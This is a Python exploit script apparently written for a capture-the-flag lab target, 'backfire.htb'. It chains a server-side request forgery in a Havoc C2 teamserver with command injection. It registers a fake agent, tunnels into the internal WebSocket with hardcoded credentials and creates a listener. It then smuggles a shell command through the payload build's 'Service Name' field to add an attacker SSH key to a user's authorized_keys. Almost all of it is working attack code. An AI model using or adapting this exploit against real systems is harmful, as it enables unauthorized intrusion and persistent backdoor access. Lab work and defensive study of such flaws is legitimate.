"""Teamserver socket-tunnel client used against a lab target.

The script registers an agent with the teamserver at ``TEAMSRV_URL``, asks it
to open a socket to ``SOCK_IP:SOCK_PORT``, and then writes a WebSocket
handshake followed by three JSON events (authenticate, create listener,
build request) through that socket.  Finally it reads back whatever the
teamserver queued on the socket and prints it.

Only run this against systems you are explicitly authorized to test.
"""

import binascii
import json
import os
import random
import string
import subprocess
from hashlib import sha3_256

import requests
import urllib3
from Crypto.Cipher import AES
from Crypto.Util import Counter

# Disable SSL warnings (not recommended for production)
urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings(
    requests.packages.urllib3.exceptions.InsecureRequestWarning
)

# Constants and configurations
TEAMSRV_URL = "https://backfire.htb"
HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64)"}
# Seconds to wait for the teamserver before giving up on a single request.
REQUEST_TIMEOUT = 30

C2_USER = "ilya"
C2_PASS_RAW = "CobaltStr1keSuckz!"
C2_PASS_HASH = sha3_256(C2_PASS_RAW.encode()).hexdigest()

MAGIC_COOKIE = b"\xde\xad\xbe\xef"
AES_KEY = b"\x00" * 32
AES_IV = b"\x00" * 16

AGENT_ID = random.randint(100000, 999999).to_bytes(4, "big")
HOSTNAME = b"DESKTOP-ASDF123"
USERNAME = b"Administrator"
DOMAIN_NAME = b"ECORP"
INTERNAL_IP = b"127.0.0.1"
PROCESS_NAME = "msedge.exe".encode("utf-16le")
PROCESS_ID = random.randint(1000, 5000).to_bytes(4, "big")

SOCK_ID = b"\x11\x11\x11\x11"
SOCK_IP = "127.0.0.1"
SOCK_PORT = 40056

SSH_KEYFILE = "key"


# Logging functions
def log_info(message):
    """Print *message* with an ``[INFO]`` prefix."""
    print(f"[INFO] {message}")


def log_error(message):
    """Print *message* with an ``[ERROR]`` prefix."""
    print(f"[ERROR] {message}")


# Padding AES key to ensure it is 32 bytes
def pad_key(k: bytes) -> bytes:
    """Return *k* right-padded to 32 bytes with ASCII ``b"0"`` bytes.

    Keys that are already 32 bytes or longer are returned unchanged (they are
    not truncated).
    """
    return k.ljust(32, b"0")


def _ctr_cipher(k: bytes, iv: bytes):
    """Build an AES-CTR cipher whose 128-bit counter starts at *iv*."""
    ctr = Counter.new(128, initial_value=int(binascii.hexlify(iv), 16))
    return AES.new(pad_key(k), AES.MODE_CTR, counter=ctr)


# AES CTR mode encryption
def aes_ctr_encrypt(k: bytes, iv: bytes, data: bytes) -> bytes:
    """Encrypt *data* with AES-CTR using key *k* and initial counter *iv*."""
    return _ctr_cipher(k, iv).encrypt(data)


# AES CTR mode decryption
def aes_ctr_decrypt(k: bytes, iv: bytes, data: bytes) -> bytes:
    """Decrypt *data* with AES-CTR using key *k* and initial counter *iv*."""
    return _ctr_cipher(k, iv).decrypt(data)


# Integer to big-endian bytes
def i2b(v: int, length: int = 4) -> bytes:
    """Integer to big-endian bytes."""
    return v.to_bytes(length, "big")


class _FailedResponse:
    """Stand-in returned by ``post_data`` when the HTTP request itself fails.

    It exposes the two attributes callers read (``status_code`` and
    ``content``) so they can treat a transport failure like any other
    non-200 reply.
    """

    status_code = 0
    content = b""


# Send a POST request
def post_data(packet: bytes) -> requests.Response:
    """Send a POST request to TEAMSRV_URL with the given packet.

    Certificate verification is disabled.  On any ``requests`` error
    (including a timeout after ``REQUEST_TIMEOUT`` seconds) the error is
    logged and an object with ``status_code == 0`` and empty ``content`` is
    returned instead of raising.
    """
    try:
        return requests.post(
            TEAMSRV_URL,
            data=packet,
            headers=HEADERS,
            verify=False,
            timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException as e:
        log_error(f"POST request failed: {e}")
        return _FailedResponse()


# Generate an SSH key if it doesn't exist, return public key contents
def create_ssh_key() -> str:
    """Generate an SSH key if it doesn't exist, return public key contents.

    Returns an empty string when ``ssh-keygen`` fails or is not installed, or
    when the ``.pub`` file is missing.
    """
    if not os.path.exists(SSH_KEYFILE):
        log_info("Generating SSH key...")
        cmd = [
            "ssh-keygen", "-t", "ed25519", "-C", SSH_KEYFILE,
            "-f", SSH_KEYFILE, "-q", "-N", "",
        ]
        try:
            subprocess.run(cmd, check=True)
            os.chmod(SSH_KEYFILE, 0o600)
        except (subprocess.CalledProcessError, FileNotFoundError) as e:
            log_error(f"SSH key generation failed: {e}")
            return ""

    pubfile = SSH_KEYFILE + ".pub"
    try:
        # Context manager so the file handle is closed deterministically.
        with open(pubfile, "r") as fh:
            return fh.read().strip()
    except FileNotFoundError:
        return ""


# Build a masked WebSocket frame for the given message
def build_websocket_frame(msg: str) -> bytes:
    """Build a masked WebSocket frame for the given message.

    The frame is a single final text frame (first byte ``0x81``) with the
    mask bit set and a random 4-byte masking key.
    """
    payload = msg.encode("utf-8")
    first_byte = 0x81  # text frame
    mask_bit = 0x80
    length = len(payload)

    # Encode the payload length
    if length <= 125:
        header = bytes([first_byte, mask_bit | length])
    elif length <= 65535:
        header = bytes([first_byte, mask_bit | 126]) + length.to_bytes(2, "big")
    else:
        header = bytes([first_byte, mask_bit | 127]) + length.to_bytes(8, "big")

    # Random mask
    mask = os.urandom(4)
    masked_payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return header + mask + masked_payload


# Send a packet with optional AES-CTR encryption
def send_packet(cmd: bytes, rid: bytes, body: bytes, desc: str, encrypt=True) -> None:
    """Construct a packet with optional AES-CTR encryption and send it.

    With ``encrypt=True`` the length-prefixed *body* is encrypted and sent
    after the header, *cmd* and *rid*.  With ``encrypt=False`` *cmd* and
    *rid* are not written by this function; *body* is appended to the header
    as-is.

    Logs success/fail status for the given desc.  A 404 reply is logged at
    info level rather than as a failure.
    """
    if encrypt:
        # Encrypt length + body
        enc = aes_ctr_encrypt(AES_KEY, AES_IV, i2b(len(body) + 4) + body)
        pkt = i2b(12 + len(enc)) + MAGIC_COOKIE + AGENT_ID + cmd + rid + enc
    else:
        pkt = i2b(12 + len(body)) + MAGIC_COOKIE + AGENT_ID + body

    r = post_data(pkt)
    if r.status_code == 200:
        log_info(f"{desc} => OK")
    elif r.status_code == 404:
        log_info("You have pawned it!")
    else:
        log_error(f"{desc} => FAIL ({r.status_code})")


# Register agent
def step_register_agent():
    """Send the unencrypted registration packet describing this agent."""
    log_info("Registering agent...")
    cmd_id = b"\x00\x00\x00\x63"
    req_id = b"\x00\x00\x00\x01"
    extra = b"\xab" * 100
    body = (
        cmd_id
        + req_id
        + AES_KEY
        + AES_IV
        + AGENT_ID
        + i2b(len(HOSTNAME)) + HOSTNAME
        + i2b(len(USERNAME)) + USERNAME
        + i2b(len(DOMAIN_NAME)) + DOMAIN_NAME
        + i2b(len(INTERNAL_IP)) + INTERNAL_IP
        # NOTE(review): the advertised length is 6 less than the actual byte
        # length of PROCESS_NAME; the reason is not evident from this file,
        # so confirm before changing it.
        + i2b(len(PROCESS_NAME) - 6) + PROCESS_NAME
        + PROCESS_ID
        + extra
    )
    # cmd/rid are already part of `body`; send_packet ignores its own
    # cmd/rid arguments when encrypt=False.
    send_packet(b"", b"", body, "Register Agent", encrypt=False)


# Open socket on the teamserver
def step_open_socket():
    """Ask the teamserver to open a socket to ``SOCK_IP:SOCK_PORT``."""
    log_info("Opening socket on the teamserver...")
    cmd = b"\x00\x00\x09\xec"
    rid = b"\x00\x00\x00\x02"
    sub = b"\x00\x00\x00\x10"
    la = b"\x22\x22\x22\x22"
    lp = b"\x33\x33\x33\x33"
    # The address is sent with its octets in reverse order.
    rev_ip = bytes(int(octet) for octet in reversed(SOCK_IP.split(".")))
    fwd_port = i2b(SOCK_PORT)
    body = sub + SOCK_ID + la + lp + rev_ip + fwd_port
    send_packet(cmd, rid, body, "Open Socket")


# Write data to the socket
def step_write_socket(data_bytes: bytes, desc: str, subcmd: bytes = b"\x00\x00\x00\x11"):
    """Write data to the socket. You can customize subcmd if needed.

    *data_bytes* is length-prefixed and sent for socket ``SOCK_ID``; *desc*
    is only used for the log line emitted by ``send_packet``.
    """
    cmd = b"\x00\x00\x09\xec"
    rid = b"\x00\x00\x00\x08"
    st = b"\x00\x00\x00\x03"
    scs = b"\x00\x00\x00\x01"
    body = subcmd + SOCK_ID + st + scs + i2b(len(data_bytes)) + data_bytes
    send_packet(cmd, rid, body, desc)


# Read data from the socket and decrypt it
def step_read_socket() -> bytes:
    """Read data from the socket, decrypt, and return it.

    Returns ``b""`` when the teamserver does not answer with HTTP 200.
    Otherwise the first 12 bytes of the response are skipped, the rest is
    decrypted, and the first 12 bytes of the plaintext are dropped.
    """
    log_info("Reading response from socket...")
    cmd = b"\x00\x00\x00\x01"
    rid = b"\x00\x00\x00\x09"
    pkt = i2b(12 + len(cmd + rid)) + MAGIC_COOKIE + AGENT_ID + cmd + rid
    r = post_data(pkt)
    if r.status_code != 200:
        log_error(f"Read from Socket => FAIL ({r.status_code})")
        return b""

    log_info("Read from Socket => OK")
    dec = aes_ctr_decrypt(AES_KEY, AES_IV, r.content[12:])
    return dec[12:]


# Main script execution
def main() -> None:
    """Run the full sequence: register, open socket, send events, read reply.

    Exits with status 1 when no SSH public key is available.
    """
    ssh_pub = create_ssh_key()
    if not ssh_pub:
        log_error("No SSH public key found or could not be generated.")
        # Non-zero status so callers can tell the run did not happen.
        raise SystemExit(1)

    step_register_agent()
    step_open_socket()

    handshake_req = (
        b"GET /havoc/ HTTP/1.1\r\n"
        b"Host: 127.0.0.1:40056\r\n"
        b"Upgrade: websocket\r\n"
        b"Sec-WebSocket-Key: h/TPDav2VwnJVqKeDYxRgQ==\r\n"
        b"Sec-WebSocket-Version: 13\r\n"
        b"Connection: Upgrade\r\n\r\n"
    )
    step_write_socket(handshake_req, "WebSocket Handshake")

    auth_payload = {
        "Body": {"Info": {"Password": C2_PASS_HASH, "User": C2_USER}, "SubEvent": 3},
        "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": C2_USER},
    }
    step_write_socket(build_websocket_frame(json.dumps(auth_payload)), "Authenticate C2")

    rnd_listener = "".join(
        random.choice(string.ascii_lowercase + string.digits) for _ in range(16)
    )
    rnd_port = random.randint(1024, 65535)
    listener_info = {
        "Body": {
            "Info": {
                "Headers": "",
                "HostBind": "0.0.0.0",
                "HostHeader": "",
                "HostRotation": "round-robin",
                "Hosts": "0.0.0.0",
                "Name": rnd_listener,
                "PortBind": str(rnd_port),
                "PortConn": str(rnd_port),
                "Protocol": "Https",
                "Proxy Enabled": "false",
                "Secure": "true",
                "Status": "online",
                "Uris": "",
                "UserAgent": "Mozilla/5.0 (Windows NT 6.1; WOW64)",
            },
            "SubEvent": 1,
        },
        "Head": {"Event": 2, "OneTime": "", "Time": "00:00:00", "User": C2_USER},
    }
    step_write_socket(build_websocket_frame(json.dumps(listener_info)), "Create Listener")

    # NOTE(review): the trailing "Run script" literal is joined onto the last
    # chmod argument by implicit string concatenation; this looks
    # unintentional. Left byte-identical here; confirm before removing.
    cmd_injection = (
        "mkdir -p /home/ilya/.ssh && "
        f"echo '{ssh_pub}' >> /home/ilya/.ssh/authorized_keys && "
        "chmod 700 /home/ilya/.ssh && chmod 600 /home/ilya/.ssh/authorized_keys"
        "Run script"
    )
    injection_svc = f' \\\\\\" -mbla; {cmd_injection} && false #'
    final_json = {
        "Body": {
            "Info": {
                "AgentType": "Demon",
                "Arch": "x64",
                "Listener": rnd_listener,
                "Config": (
                    "{\n"
                    ' "Amsi/Etw Patch": "None",\n'
                    ' "Indirect Syscall": false,\n'
                    ' "Injection": {\n'
                    ' "Alloc": "Native/Syscall",\n'
                    ' "Execute": "Native/Syscall",\n'
                    ' "Spawn32": "C:\\\\Windows\\\\SysWOW64\\\\notepad.exe",\n'
                    ' "Spawn64": "C:\\\\Windows\\\\System32\\\\notepad.exe"\n'
                    " },\n"
                    ' "Jitter": "0",\n'
                    ' "Proxy Loading": "None (LdrLoadDll)",\n'
                    f' "Service Name":"{injection_svc}",\n'
                    ' "Sleep": "2",\n'
                    ' "Sleep Jmp Gadget": "None",\n'
                    ' "Sleep Technique": "WaitForSingleObjectEx",\n'
                    ' "Stack Duplication": false\n'
                    "}"
                ),
                "Format": "Windows Service Exe",
            },
            "SubEvent": 2,
        },
        "Head": {"Event": 5, "OneTime": "true", "Time": "18:39:04", "User": C2_USER},
    }
    step_write_socket(build_websocket_frame(json.dumps(final_json)), "Inject SSH Key")

    resp = step_read_socket()
    if resp:
        log_info("[Teamserver Final Response]\n" + resp.decode("utf-8", errors="ignore"))
        print("\033[1;32m\n~~~~~Exploit complete!~~~~~\033[0m")
        print("You can now SSH into the target via:")
        print(f"\033[1;93mssh -i {SSH_KEYFILE} ilya@backfire.htb\033[0m")
        print("\033[1;31m\n~~~~~Pawned!~~~~~\033[0m")
    else:
        # `resp` is empty on this path, so there is nothing to decode.
        log_error("[Teamserver Final Response]\n" + "No response")


if __name__ == "__main__":
    main()